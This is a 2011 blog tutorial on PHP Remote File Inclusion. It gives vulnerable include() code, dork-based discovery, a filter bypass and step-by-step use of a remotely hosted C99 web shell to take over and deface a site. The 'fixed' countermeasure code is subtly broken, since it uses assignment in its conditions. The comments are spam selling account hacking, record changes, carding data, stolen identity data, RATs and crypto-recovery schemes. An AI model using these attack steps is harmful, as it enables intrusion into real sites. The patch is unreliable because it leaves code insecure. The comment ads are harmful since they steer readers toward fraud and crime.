Monday, September 5, 2011

Remote File Inclusion(RFI)

What is Remote File Inclusion?

Its a vulnerability found in websites, this kind of vulnerability allows attacker to include and run the remote file(script), and can compromise the system. This vulnerability occurs due to the improper validation of user input. In this tutorial I will be Explaining you "how to perform this attack? and how to avoid or counter this kind of attacks?".
I am using PHP in this tutorial to explain the RMI, the reason is-it is the most widely used language and secondly I am very much comfortable in this language;). And the concept of RMI remains same for all languages.


Understanding RFI:
Before we start we must be familiar with the PHP include() and related functions(require()). This function is used to include or run another page inside current page. Lets see a simple examples to get a clear idea of this function. See the code below:
This is index.php(Exploitable code):

<?php
if(isset($_GET['page']))   //ensures that whether GET argument received any page value.
{
   $page=$_GET['page'];  //store the page to display in a variable
   include($page.".php");  //display the page.
}
else{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>

click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?
}
?>
If you understand the above code skip the explanation part.

Exaplanation:
Lets say the URL of this page is www.mysite.com/index.php. 
directory structure:
--mysite.com
     |--index.php
     |--rf1.php
     |--rf2.php
You may be thinking what will happen If use this URL in browser first time, well the answer is the image given below.














Now you may be thinking what happened to the php code written in the first few lines.
Lets see: isset($_GET['page'] this function will return true only if the "GET" variable have some "value". And when you go to the url, the GET is null, that means isset() is returning false and that's the reason you have seen the else part of the page which is basic html code. Now the biggest question is what is this "value"? and from where we are going to get this "value"? and the answer is: index.php?page=rfi1(inside the html block) whenever we click this link we are calling index.php page and we are passing a value "rfi1" to the GET variable, That means we are requesting the new page in the same site i.e. rfi1. After you clicked the link the "if" condition is satisfied and it will include the contents of page "rfi1.php" in current page using include() and the url is changed to www.mysite.com/index.php?page=rfi1.


Finding Vulnerability:
The example which i gave is clearly vulnerable lets see how: Consider now I am requesting a page "rfi3" as we know there is no "rfi3" in the directory, then it will show error something like this:















If any website shows such error that means user inputs are not filtered and the page is vulnerable. You may be little confused by this example, lets take simple example for finding whether the page is vulnerable or not?type:www.mysite.com/index.php?page=http://google.com? now if you get google page, the page is clearly vulnerable. If you observed carefully I have used "?" in the URL at the end, the reason is if we don't keep "?" the include() function will certainly include "http://google.com.php"(include($page.".php")) rather then "http://google.com".
Sometimes it is possible that to secure the website programmer checks the GET argument  contain  "http://" or "www", if it is the page won't be included but those programmers can be tricked by using "HTtp://" "WWw" etc..
If the programmer is smart he will convert the whole path to lowercase and checks the same condition.
Note: Sometimes you may get error something like this "http:// wrapper is disabled in the server configuration by allow_url_fopen....'' that means the allow_url_fopen and allow_url_include is turned off in php.ini file, you are pity fucked up in this situation at-least for RFI attack.


Use of Google Dorks To Find Vulnerability: Lets say you want to see if any page of a website(say abc.com) is vulnerable or not. Type:-
site:abc.com  inurl:?page= in Google search, it will return all the pages of the form anything.com?page=anything related to the website abc.com, see dorks to understand this.
Find yourself how to use the dork efficiently for RFI.


How to perform RFI Attack:
Okay, We found the vulnerability now the question is how to hack into the website? To deface a website we need a shell program, Click Here to download C99 Shell, it is program that is used as explorer(same as windows explorer). To have a feel of this script upload it in my3gb.com and access the uploaded url after sign out, you can still be able to manage the files and folder in your account. So, Somehow we have to upload or run this "shell" inside the victims server. If you can upload this script directly upload it and access the path where the file is uploaded. Or we can use our vulnerable page to run the script. First of all upload your shell script in a remote server, lets say we have uploaded in "abc.com/shell.txt". And we have our vulnerable link: www.mysite.com/index.php?page=  now try to access the url:  www.mysite.com/index.php?page=http://abc.com/shell.txt tadaa!! you have access to the "mysite.com" server. You may be wondering why I used "shell.txt" why not "shell.php", the reason is if we use shell.php it will run on remote server rather than victim server which we don't want.


Countermeasures:
1. Always set allow_url_include and allow_url_fopen to "off" in php.ini file unless it is really needed.
2. Filter the input. Example check the GET argument for "http://" or "www". First convert them to lowercase and check whether GET argument contains these.
3. Use select case or else if. Lets see how to modify the same code using IF-ELSE.

<?php
if(isset($_GET['page']))     //ensures that whether GET argument received any page value.
{
   if($_GET['page']="rfi1")
   {
   include(rfi1.php);    //display the page rfi1.
    }
    elseif($_GET['page']="rfi2")
   {
   include(rfi2.php);    //display the page rfi2.
    }
    else{
    include(index.php);   
    }
}
else{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>
click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?
}
?>
This code ensures that if non of the conditions are satisfied go to else part, that is open index.php

11 comments:

  1. Stop being scammed by fake hackers. Hire a Ethical Hacking group who are professional and real. You might be curious that what hacking group services can provide? .. If you hire a hacker, you always have worried of losing your money. We won't keep a cent if can't do our job. 100% refund if job is not completed. Hacking Services that you will find here at: ALEXGHACKLORD are custom to fit your hacking needs... A professional and experienced hacker providing hacking services for a variety of client needs. Specialize in many different Hacking Services some of my most popular hacking services are, Hack INTO ANY BANK WEBSITE Hack into any COMPANY WEBSITE HACK INTO ANY GOVERNMENT AGENCY WEBSITE HACK INTO SECURITY AGENCY WEBSITE AND ERASE CRIMINAL RECORDS Hack into CRAIGSLIST AND REMOVE FLAGGING HACK INTO ANY DATABASE SYSTEM HACK PAYPAL ACCOUNT HACK WORD-PRESS Blogs SERVER CRASHED hack HACK INTO ANY SCHOOL DATABASE AND CHANGE UNIVERSITY GRADES, no matter how secured HACK INTO CREDIT BUREAU DATABASE AND INCREASE YOUR CREDIT SCORE HACK ANY EMAIL OR SOCIAL NETWORK AND KNOW IF YOUR PARTNER IS CHEATING ON YOU HACK INTO YOUR PARTNER'S PHONE PICS, TEXT MESSAGE AND LISTEN TO CALLS TO KNOW IF HE IS CHEATING UNTRACEABLE INTERNET PROTOCOL HAVE YOU OR YOUR CHILD BEEN BULLIED ONLINE BEFORE AND WANT TO GET BACK AT THE PERSON, WE CAN HELP YOU TRACE THE ACTUAL LOCATION OF THE PERSON AND DO WHATEVER YOU REQUEST TO THE PERSONS COMPUTER IS ANYONE BLACKMAILING YOU ONLINE AND YOU WANT US TO GET INTO THEIR COMPUTER AND DESTROY DATA AND EVIDENCES AGAINST YOU? If you need a hacking service that is not listed, feel free to contact him at: ALEXGHACKLORD@GMAIL. COM

    ReplyDelete
  2. Are you looking for prove to know if your spouse is cheating on you just mail elizabethjone146@gmail.com
    WhatsApp +18572012269 his really a God sent to me and i really appreciate his good work that he did for me this hacker broke into my husband phone cause i felt my husband was cheating on me then i contacted elizabethjone146@gmail.com
    WhatsApp +18572012269 for help i couldn't believe that this great hacker was able to hack into my husband cell and brought me all his social media messages he uses and all the call logs\text messages\deleted text messages and many more this hacker is good inbox him if you need help in hacking best hacker
    contact
    elizabethjone146@gmail.com
    WhatsApp +18572012269

    ReplyDelete
  3. Contact: elizabethjone146@gmail.com
    WhatsApp +18572012269
    if you have any problem when it comes to-
    - Phone hack
    - Delete records
    - Improve credit score
    - improve poor grades
    _ gmail facebook
    _ twiter hotmail
    _ aol database
    I have used there service in gaining access to my ex boy friend who has been trying to blackmail me.
    so am talking from experience of there service, it works for real and i trust there service 100%

    ReplyDelete
  4. I got a clean job from elizabethjone146@gmail.com hacking into my husband Facebook and text messages
    Contact: elizabethjone146@gmail.com
    WhatsApp +18572012269

    ReplyDelete
  5. contact elizabethjone146@gmail.com
    WhatsApp +18572012269
    DO YOU NEED A PROFESSIONAL HACKER OFFERING ALL TYPES OF HACK RELATED JOBS.
    Such as:-
    BITCOIN HACKING
    BITCOIN INVEST
     FACEBOOK HACKING
     WHATSAPP HACKING
     INSTAGRAM HACKING
     SNAPCHAT HACKING
     -TWITTER HACKING
     PHONE CLONING
     AMBIENT LISTENING
     FULL PHONE ACCESS
     LOCATION TRACKING
     BANK ACCOUNT HACKING
     ERASE CRIMINAL RECORDS
     MONEY WIRING
     CREDIT LIMIT UPGRADE
    WhatsApp +18572012269
    contact elizabethjone146@gmail.com

    ReplyDelete
  6. Hello all
    am looking few years that some guys comes into the market
    they called themselves hacker, carder or spammer they rip the
    peoples with different ways and it’s a badly impact to real hacker
    now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
    Anyone want to make deal with me any type am available but first
    I‘ll show the proof that am real then make a deal like

    Available Services

    ..Wire Bank Transfer all over the world

    ..Western Union Transfer all over the world

    ..Credit Cards (USA, UK, AUS, CAN, NZ)

    ..School Grade upgrade / remove Records

    ..Spamming Tool

    ..keyloggers / rats

    ..Social Media recovery

    .. Teaching Hacking / spamming / carding (1/2 hours course)

    discount for re-seller

    Contact: 24/7

    fixitrogers@gmail.com

    ReplyDelete
  7. contact elizabethjone146@gmail.com
    WhatsApp +18572012269
    Do you need a hacker to hack into your cheating ass account or do you want to hack into the following account such as.
    1-facebook hack
    2-gmail hack
    3-whatsapp hack
    4-website hack
    5-tracking calls
    6-online hacking lectures
    7-phone clone
    8-online records changes
    9-retrival of hacked social media account

    10 ATM merchine hack/password from any Email Address.
    11 Get any password from any Facebook, Twitter or Instagram account.
    12 Cell phone hacking (whatsapp, viber, line, wechat, etc)
    13 Grades changes (institutes and universities)
    14 Websites hacking, pentesting.
    15 IP addresses and people tracking.
    16 Hacking courses and classes.
    17 blank ATM CARD.
    contact elizabethjone146@gmail.com
    WhatsApp +18572012269

    ReplyDelete
  8. He is no scam,i tested him and he delivered a good job,he helped me settle bank loans,he also helped my son upgrade his scores at high school final year which made him graduate successfully and he gave my son free scholarship into the college,all i had to do was to settle the bills for the tools on the job,i used $500 to get a job of over $50000 done all thanks to Walt,he saved me from all my troubles,sharing this is how i can show gratitude in return for all he has done for me and my family

    Gmail; Brillianthackers800@gmail.com
    Whatsapp number; +1(224)2140835

    ReplyDelete
  9. Hello everyone, The Cryptocurrency world is very volatile and a lot of individuals have lost some crypto coins and crypto assets to online scams . I was also a victim of fake telegram personnels from Uniswap group. My wallet address security and 12 phrases got compromised and I lost all my crypto coins (Filecoin, Eth, Btc, and EthereumMax) to the tune of $184.000 . This left me so devastated and left me depressed at my lowest point because my family could’ve been homeless if I didn’t recover my crypto coins successfully which was most of my savings and financial assets. I laid my complaint in the group and a real group admin referred me to Wizard Recovery Home. This cryptocurrency recovery agency saved my life by helping me recover all my losses in just 6days. I provided necessary requirements and relative information to complete the successful recovery of my crypto coins. I was filled with joy once I got my coins back, Here is his contact info if any one also need his help. Email: wizardrecoveryhome@gmail.com Whatassp Number: +79522849781

    ReplyDelete
  10. Bulk Fresh Fullz/Pros/Leads Available

    High Credit Scores Fullz 700+
    CC Fullz (USA/UK/CANADA)
    SSN DOB DL Fullz
    Office365 Leads
    Dumps With Pin
    Business EIN Fullz
    Leads for Tax Return/PUA USA

    ICQ/TG - @killhacks
    WA - +92 317 2721122
    Email- exploit dot tools4u at gmail dot com

    All Spamming & Hacking Tools
    Carding Methods/Loan Methods
    Mailers/Senders/Shells/Brutes
    C-paneles/RDP's/SMTP's
    Onion Web Links
    I.p's/Proxies/Server I.P's
    Combos/Premium account Logs
    Fr**d B**le 201/2022/2023 Updated

    ICQ- 752822040
    Telegram - @killhacks

    ReplyDelete
  11. I was scammed by a fake Bitcoin investment company online in June. I lost about $782, 000 to them and they denied all my withdrawal requests, and gave me all sorts of filthy requests. It was really hard for me because that was all my life savings and they tricked me into investing with their company with a guarantee that I will make more profit. They took all my money and I did not hear from them anymore. I was able to recover all I lost through the help of Lord Hacker Ultimate. I paid for the tools used and 20% of the recovered funds as his service charge after I got all my money back. I am really grateful to him because I know a lot of people here have been scammed and need help. reach out to them via; L.H.ULTIMATE @ FASTSERVICE .COM, website: lordhackerultimate.wixsite.com/lordhackerultimate. Their YouTube Page @lordhackerultimate, for any desired Hacking Services

    ReplyDelete